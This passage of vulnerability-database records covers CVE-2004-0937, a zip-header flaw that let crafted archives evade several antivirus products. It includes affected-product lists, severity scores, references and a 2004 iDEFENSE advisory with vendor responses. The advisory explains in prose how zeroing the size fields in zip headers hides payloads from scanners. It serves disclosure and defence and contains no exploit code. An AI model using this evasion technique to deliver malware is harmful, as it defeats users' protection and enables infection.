"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0937",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9367",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0937",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200502-042",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9367",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Many anti-virus vendors have problems when processing .zip files. Remote attackers can use this vulnerability to embed malicious code to bypass the inspection of anti-virus software. The problem lies in the analysis of the header field of the .zip file. The information stored in the compressed file in the .zip file format is divided into two parts, one is the local (local) header field, and the other is the global (global) header field. Local header field data exists before the compressed data file, while global fields exist at the end of the .zip file. Attackers can modify the uncompressed byte size value of the archive file in the local and global header field information without affecting the function, but many antivirus vendors\u0027 software cannot handle such archive files well. If the compressed payload contains malicious code, it cannot be detected",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9367"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9367",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9367"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2004-0937",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9367",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"id": "VAR-200502-0003",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9367"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:29.016000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Many anti-virus vendors software Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146859"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-02-09T00:00:00",
"db": "VULHUB",
"id": "VHN-9367"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2005-02-09T05:00:00",
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9367"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
}
}
VAR-200501-0310
Vulnerability from variot - Updated: 2023-12-18 12:40Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Kaspersky is a well-known antivirus software. Kaspersky 3.x and 4.x versions have issues when processing .zip files, resulting in a vulnerability to bypass antivirus checks.
II. DESCRIPTION
Remote exploitation of an exceptional condition error in multiple vendors' anti-virus software allows attackers to bypass security protections by evading virus detection. The .zip file format stores information about compressed files in two locations - a local header and a global header. The local header exists just before the compressed data of each file, and the global header exists at the end of the .zip archive. It is possible to modify the uncompressed size of archived files in both the local and global header without affecting functionality. This has been confirmed with both WinZip and Microsoft Compressed Folders. An attacker can compress a malicious payload and evade detection by some anti-virus software by modifying the uncompressed size within the local and global headers to zero.
III. ANALYSIS
Successful exploitation allows remote attackers to pass malicious payloads within a compressed archive to a target without being detected. Most anti-virus engines have the ability to scan content packaged with compressed archives. As such, users with up-to-date anti-virus software are more likely to open attachments and files if they are under the false impression that the archive was already scanned and found to not contain a virus.
IV. The Vendor Responses section of this advisory contains details on the status of specific vendor fixes for this issue.
V. WORKAROUND
Filter all compressed file archives (.zip) at border gateways, regardless of content.
VI. VENDOR RESPONSES
McAfee "The McAfee scan engine has always been a market leader in detection of viruses, worms and Trojans within compressed and archived file formats. As such the mechanism used for the detection of such payloads has been designed to ensure all archive files are thoroughly scanned at each nested level in the file to ensure that all appropriate parts of the file are scanned.
McAfee is aware of a proof of concept exploitation in Zip archive payloads where information in the local header part of the archive is modified.
The local header exists just before the compressed data of each file. It is possible to modify the uncompressed size of archived files in the local header without affecting functionality. Consequently there is the potential for a malicious payload to be hidden and avoid anti-virus detection by modifying the uncompressed size within the local headers to zero.
The techniques used by McAfee to analyze Zip archives have allowed a comprehensive solution for the Zip file format vulnerability to be provided to protect customers.
The latest update for the current 4320 McAfee Anti-Virus Engine DATS drivers (Version 4398 released on Oct 13th 2004) further enhances the protection afforded to McAfee customers against such potential exploits.
A DATS Driver update issued in Version 4397 (October 6th 2004) provided early protection for the same potential exploit targeted specifically for Gateway and Command line scanning.
If a detection of this type of exploit is found it will trigger the message "Found the Exploit-Zip Trojan!" to be displayed.
Updates for the DAT files mentioned above can be located at the following links:
Home (Retail) Users: http://download.mcafee.com/uk/updates/updates.asp
Business (Enterprise) Users: http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1
It should be noted that whilst McAfee take the potential for this exploit to be used maliciously seriously, to date no evidence of such an exploit has been discovered. McAfee has provided additional protection through the DATS driver update however with usage of the comprehensive suite of anti-virus protection strategies provided by McAfee products, MacAfee are confident that this exploit presented no additional threat to its customers.
It should be noted that with McAfee on-access scanning active, such modification for malicious purposes to hide payloads only delays eventual detection - McAfee on-access detection will detect any payload with malicious intent as malware.
McAfee continues to focus on ensuring that customers receive maximum protection and provide a rapid response to all potential vulnerabilities thus ensuring customer satisfaction."
Computer Associates "With the assistance of iDEFENSE, Computer Associates has identified a medium-risk vulnerability in a shared component of eTrust Antivirus which may allow a specially crafted .ZIP file to bypass virus detection. A number of CA products embed this technology including solutions from eTrust, Brightstor and others.
Customers are encouraged to visit the CA support web site below for more information about this vulnerability, a list of products and platforms that are effected, and remediation procedures. http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp.
At Computer Associates, every reported exposure is handled with the utmost urgency. We strive to ensure that no customer is left in a vulnerable situation."
Kaspersky (09/24/2004) "...this bug for scanners based on 3.x-4.x engines will be fixed in next (not current) cumulative update.
For scanners based on new 5.0 engine we recommend you waiting for the release of our next maintenance pack. We are going to release it in October."
Sophos "A vulnerability has been discovered in Sophos's handling of Zip archive files, whereby a Zip file can be deliberately altered to prevent accurate scanning by Sophos anti-virus products of its contents.
Although theoretically a risk, Sophos has not seen any examples of malware attempting to employ this vulnerability.
Furthermore, The vulnerability does not prevent Sophos's desktop on-access scanner from correctly detecting viruses (and preventing actual infection) which manage to bypass the email gateway software, so the risks of infection are very small.
Sophos has enhanced its scan engine to deal with malformed Zip files. Version 3.87.0 of Sophos Anti-Virus on all operating system platforms except Windows 95/98/Me includes this fix and customers will be automatically updated to this version via EM Library from Wednesday 20 October 2004. Additionally, a version of the software will be available for download from the Sophos website from Friday 22 October 2004.
Sophos Anti-Virus for Windows 95/98/Me customers will be updated with the fix from version 3.88.0 (available from 24 November 2004).
Sophos thanks iDEFENSE for their assistance in identifying this vulnerability."
Eset "The vulnerability was caused by the fact that some archive compression/decompression software (including Winzip) incorrectly handles compressed files with deliberately damaged header fields, thus, in-fact, allowing creation of the damaged archive files, that could be automatically repaired on the victims computer without notifying the user.
Eset has made appropriate modifications to archive-scanning code to handle such kind of archives immediately after receiving notification from iDEFENSE. These changes are contained in archive-support module version 1.020, released on 16th September 2004 at 21:00 CET. The update was available for all clients with Automatic Virus-Signatures Update set."
RAV No vendor response
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues:
CAN-2004-0932 - McAfee CAN-2004-0933 - Computer Associates CAN-2004-0934 - Kaspersky CAN-2004-0937 - Sophos CAN-2004-0935 - Eset CAN-2004-0936 - RAV
These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
09/16/2004 Initial vendor notification 09/16/2004 iDEFENSE clients notified 10/18/2004 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp
X. LEGAL NOTICES
Copyright © 2004 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0310",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
